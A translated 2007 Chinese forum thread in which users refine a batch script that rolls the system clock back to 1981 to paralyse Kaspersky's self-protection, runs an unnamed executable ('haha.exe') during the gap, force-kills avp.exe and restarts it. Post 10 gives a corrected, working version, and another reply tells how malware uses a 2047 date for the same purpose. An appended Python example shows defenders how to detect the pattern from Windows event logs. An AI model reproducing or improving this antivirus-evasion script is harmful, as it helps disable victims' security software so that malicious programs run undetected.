|
heicai
Intermediate user
Points 385
Posts 156
Registered 2007-1-19
Status: offline
|
『Original post』:
A batch script that bypasses Kaspersky's proactive defense [question about a new method]
There is a batch script online that bypasses Kaspersky's proactive defense, but each time the date is restored Kaspersky cannot recover right away and stays unresponsive for about a minute.
I thought of ending the process and then restarting it so that it recovers quickly.
But I ran into a baffling problem while writing the batch script.
Here is the code first:
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
call %avpp%
goto exit
)
:exit
echo 结束
pause
The problem is that after Kaspersky is started, the code after the exit label cannot be executed.
I'm frustrated to death.
Experts, please advise!!!!
[ Last edited by heicai on 2007-6-29 at 12:59 PM ]
|
|
2007-6-29 12:32 |
|
|
dikex
Advanced user
Lurking and practicing batch
Points 788
Posts 366
Registered 2006-12-31
Status: offline
|
『Post 2』:
Kaspersky has driver-level protection, and the taskkill command cannot access or end its process, unless yours is a portable ("green") version or something like that
|

A batch-script novice, lurking and practicing |
|
2007-6-29 13:01 |
|
|
heicai
Intermediate user
Points 385
Posts 156
Registered 2007-1-19
Status: offline
|
『Post 3』:
Originally posted by dikex at 2007-6-29 01:01 PM:
Kaspersky has driver-level protection, and the taskkill command cannot access or end its process, unless yours is a portable ("green") version or something like that
Change the time to 1981, then change it back.
At that point Kaspersky is completely paralyzed. The taskkill command can kill the process!
|
|
2007-6-29 13:02 |
|
|
HAT
Moderator
Points 9023
Posts 5017
Registered 2007-5-31
Status: offline
|
|
2007-6-29 13:36 |
|
|
heicai
Intermediate user
Points 385
Posts 156
Registered 2007-1-19
Status: offline
|
『Post 5』:
Originally posted by HAT at 2007-6-29 01:36 PM:
Change call to start
Nonsense, that way even Kaspersky won't start.
|
|
2007-6-29 13:39 |
|
|
dikex
Advanced user
Lurking and practicing batch
Points 788
Posts 366
Registered 2006-12-31
Status: offline
|
『Post 6』:
Watch your language.
After call, the next command runs only once the called command has finished;
Changing it to start works, but if the path contains spaces, changing it directly will cause problems;
start "" "path" arguments
|

A batch-script novice, lurking and practicing |
|
2007-6-29 13:47 |
|
|
heicai
Intermediate user
Points 385
Posts 156
Registered 2007-1-19
Status: offline
|
『Post 7』:
The path in the %avpp% environment variable looks like this: "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Could the poster above please tell me exactly how start %avpp% should be written?
[ Last edited by heicai on 2007-6-29 at 01:55 PM ]
|
|
2007-6-29 13:53 |
|
|
HAT
Moderator
Points 9023
Posts 5017
Registered 2007-5-31
Status: offline
|
『Post 8』:
//Nonsense, that way even Kaspersky won't start.
Keep it low-key, keep it low-key ^_^
The start command does work
|
|
2007-6-29 14:41 |
|
|
HAT
Moderator
Points 9023
Posts 5017
Registered 2007-5-31
Status: offline
|
『Post 9』:
try this one :)
@echo off
set app=C:\test 1\my test\aa.bat
start "" "%app%"
aa.bat
@echo off
rem The echoed text reads: "My directory has this many spaces, and start can still run it, heh heh"
echo 我的目录有这么多空格,还是可以被start执行嘿嘿
pause
我的目录有这么多空格,还是可以被start执行嘿嘿
Press any key to continue . . .
|
|
2007-6-29 14:47 |
|
|
gorke
Junior user
Points 51
Posts 21
Registered 2007-6-27
Status: offline
|
『Post 10』:
@echo off
tasklist|findstr /i "avp.exe" && (
set date=%date%
date 1981-01-01
ping -n 12 localhost > nul
haha.exe
date %date%
taskkill /f /t /im avp.exe
for /f "skip=4 tokens=3-7" %%i in ('reg QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AVP /v ImagePath
') do (
set avpp=%%i %%j %%k %%l %%m
goto restart
)
:restart
start "" %avpp%
goto exit
)
:exit
echo 结束
pause
Change it to this and it works~!
|

Always been a noob~!!! |
|
2007-6-30 21:37 |
|
|
wewe12
Newcomer
Points 16
Posts 6
Registered 2006-11-8
Status: offline
|
『Post 11』:
Still not working. It says something about framedyn.dll not being found, so the program failed to start
|
|
2007-6-30 22:40 |
|
|
koala
Junior user
Speaker of the Batchs Upper House
Points 199
Posts 105
Registered 2007-6-5 From Jiangsu
Status: offline
|
『Post 12』:
So you just know that Kaspersky never considered the problem of you changing the time, huh
Save some time to cuddle your cat, and browse the forum to learn
|

『Let life be as splendid as summer flowers
and death as serene as autumn leaves』 DOS has managed it |
|
2007-8-23 15:50 |
|
|
icyheart
Intermediate user
Points 216
Posts 81
Registered 2007-8-6
Status: offline
|
『Post 13』:
Last time I saw a virus online that suddenly changed the time to 2047; Kaspersky immediately expired and could no longer be used, and at that point its self-protection stopped working, so it could be killed
|
|
2007-8-23 19:07 |
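For defenders, the pattern described in posts 3 and 13 (a large clock jump followed by the antivirus process exiting) can be detected in the Windows Security log by correlating event 4616 (system time was changed) with event 4689 (a process has exited). The following is an added example, not part of the thread; the parsed-record layout, the threshold and window values, and the sample records are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

JUMP = timedelta(days=30)   # assumed threshold for a suspicious clock jump
WINDOW = 50                 # assumed number of later records to inspect
PROTECTED = {"avp.exe"}     # security-product image names to watch

def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")

def find_clock_tamper_kills(events):
    """Return (time_change_record, exit_record, image) tuples.

    Correlates by record ID, not timestamp: once the clock has been
    moved, the timestamps of later events are themselves skewed.
    """
    alerts, armed = [], None            # armed = record ID of last big jump
    for ev in sorted(events, key=lambda e: e["record"]):
        if ev["id"] == 4616:            # the system time was changed
            if abs(_ts(ev["NewTime"]) - _ts(ev["PreviousTime"])) >= JUMP:
                armed = ev["record"]
        elif ev["id"] == 4689 and armed is not None:   # a process has exited
            image = ev["ProcessName"].rsplit("\\", 1)[-1].lower()
            if image in PROTECTED and ev["record"] - armed <= WINDOW:
                alerts.append((armed, ev["record"], image))
    return alerts

# Constructed sample records (not real logs); the dict keys are a
# hypothetical parsed form of the event data.
SAMPLE = [
    {"record": 100, "id": 4689, "ProcessName": r"C:\Windows\System32\notepad.exe"},
    {"record": 101, "id": 4616, "PreviousTime": "2007-06-29T12:30:00",
     "NewTime": "1981-01-01T12:30:00"},
    {"record": 102, "id": 4616, "PreviousTime": "1981-01-01T12:30:12",
     "NewTime": "2007-06-29T12:30:12"},
    {"record": 103, "id": 4689,
     "ProcessName": r"C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"},
    {"record": 300, "id": 4616, "PreviousTime": "2007-06-29T13:00:00",
     "NewTime": "2007-06-29T13:00:02"},      # ordinary time sync, ignored
    {"record": 400, "id": 4689, "ProcessName": r"C:\Tools\avp.exe"},  # outside window
]

if __name__ == "__main__":
    for change, exit_rec, image in find_clock_tamper_kills(SAMPLE):
        print(f"ALERT: {image} exited at record {exit_rec} after clock jump at {change}")
```

Both events are only written when the matching audit policy subcategories (Security State Change and Process Termination) are enabled.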
|
|
scriptor
Silver member
Points 1187
Posts 555
Registered 2006-12-21
Status: offline
|
『Post 14』:
Originally posted by heicai at 2007-6-29 13:53:
The path in the %avpp% environment variable looks like this: "C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\avp.exe"
Could the poster above please tell me sta ...
Do a full-disk search
for %%a in (c d e f) do (
for /f %%b in ('dir /s %%a:\avp.exe') do set avp-%%a=%%~fb
)
Then call avp-%%a
This is simple
so I won't write it out
[ Last edited by scriptor on 2007-8-24 at 03:23 AM ]
|
|
2007-8-24 03:20 |
|
|
nforce1
Junior user
Points 128
Posts 16
Registered 2007-1-26
Status: offline
|
『Post 15』:
Sweat... researching this. You're not planning to make a virus, are you??
Still, I learned something too. Hehe
Can changing the system time really kill Kaspersky?
Going to have to test it
|
|
2007-8-24 14:21 |
|